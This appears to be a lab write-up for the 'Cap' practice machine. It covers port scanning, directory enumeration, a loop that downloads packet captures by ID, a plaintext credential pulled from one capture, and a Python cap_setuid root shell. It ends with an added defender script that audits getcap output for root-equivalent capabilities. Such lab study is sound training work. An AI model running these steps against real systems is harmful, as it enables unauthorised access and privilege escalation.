Cap
Port Scan
$ sudo nmap 10.10.10.245 -p- --min-rate=10000 -T4 -sCV
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-02 05:52 UTC
Warning: 10.10.10.245 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.245
Host is up (0.31s latency).
Not shown: 44899 closed tcp ports (reset), 20633 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http gunicorn
|_http-title: Security Dashboard
|_http-server-header: gunicorn
Web App
$ gobuster dir -u http://10.10.10.245/ -w /usr/share/wordlists/dirb/common.txt
/data (Status: 302) [Size: 208] [--> http://10.10.10.245/]
/ip (Status: 200) [Size: 17457]
/netstat (Status: 200) [Size: 28836]
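Capture files are served by numeric ID under /download/, so download each ID until a request fails:
$ mkdir -p pcaps; for i in {0..10}; do wget 10.10.10.245/download/${i} -O pcaps/${i}.pcap 2>/dev/null || { rm -f pcaps/${i}.pcap; break; }; done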
0.pcap contains credentials:
nathan:Buck3tH4TF0RM3!
To root
Linux capabilities are a way to give a program specific privileges without giving it the full power of root. Python has been assigned two, and cap_setuid alone lets the interpreter change its own UID to 0:
$ getcap /usr/bin/python3.8
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
$ python3
>>> import pty
>>> import os
>>> os.setuid(0)
>>> pty.spawn("bash")
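Added example (not part of the original notes): a defender-side audit that parses `getcap -r /` output and reports files holding root-equivalent capabilities such as the cap_setuid found on python3.8 above. The capability shortlist, the function names and every sample line except the python3.8 one are assumptions made for this example; it handles getcap output both with and without the " = " separator.

```python
import re

# Capabilities that let a process become root or bypass file permissions.
# Shortlist chosen for this example; it is not exhaustive.
ROOT_EQUIVALENT = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_module",
    "cap_sys_ptrace", "cap_dac_override", "cap_dac_read_search",
    "cap_chown", "cap_fowner",
}

# One clause of the capability text form: names, "=" or "+", then flags.
CLAUSE = re.compile(r"^([a-z0-9_,]*)([=+])([eip]+)$")

# Constructed sample; only the first line comes from the page.
SAMPLE = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet cap_net_raw=ep
/opt/tools/backup agent cap_dac_read_search=ep
"""

def parse_getcap_line(line):
    """Return (path, {capability: set of flags}) for one getcap line."""
    tokens = line.strip().split(" ")
    caps = {}
    # Clauses sit at the end of the line; whatever is left is the path.
    while len(tokens) > 1 and (m := CLAUSE.match(tokens[-1])):
        names, flags = m.group(1), m.group(3)
        for name in (names.split(",") if names else ["all"]):
            caps.setdefault(name, set()).update(flags)
        tokens.pop()
    if tokens[-1] == "=":  # "path = caps" layout
        tokens.pop()
    return " ".join(tokens).strip(), caps

def risky_capabilities(getcap_output):
    """Map each file to the root-equivalent capabilities it holds as permitted."""
    findings = {}
    for line in getcap_output.splitlines():
        path, caps = parse_getcap_line(line)
        hits = sorted(c for c, flags in caps.items()
                      if "p" in flags and (c in ROOT_EQUIVALENT or c == "all"))
        if hits:
            findings[path] = hits
    return findings

if __name__ == "__main__":
    for path, hits in risky_capabilities(SAMPLE).items():
        print(f"{path}: {', '.join(hits)}")
```

Any interpreter or general-purpose tool in the report should have the capability removed with `setcap -r <path>` unless there is a documented need for it.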